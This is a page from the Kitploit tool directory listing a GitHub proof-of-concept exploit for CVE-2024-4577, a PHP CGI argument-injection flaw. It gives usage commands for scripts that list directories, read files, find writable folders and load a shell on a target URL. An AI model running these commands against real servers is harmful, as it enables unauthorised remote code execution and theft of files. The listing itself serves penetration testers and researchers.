Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-4577 — Proof-of-concept exploit for CVE-2024-4577, a PHP CGI argument injection vulnerability, enabling remote code execution and shell access on vulnerable targets. | Kitploit
Tools/GitHubGitHub/dejavu666/cve-2024-4577
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubdejavu666/cve-2024-4577

CVE-2024-4577

Proof-of-concept exploit for CVE-2024-4577, a PHP CGI argument injection vulnerability, enabling remote code execution and shell access on vulnerable targets.

View Repository
21 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

lol

CVE-2024-4577

  1. exploit command RCE value
root@kitploit:~
python3 cek.py --target http://target/index.php --ls --dir /path/to/directory
python3 cek.py --target https://target/index.php --dir /path/to/directory
python3 cek.py --target https://target/index.php --cat /path/to/directory

find writable dir
python3 cek.py --target https://target/index.php --find

load shell
python3 cuk.py --target https://target/index.php

Download Tool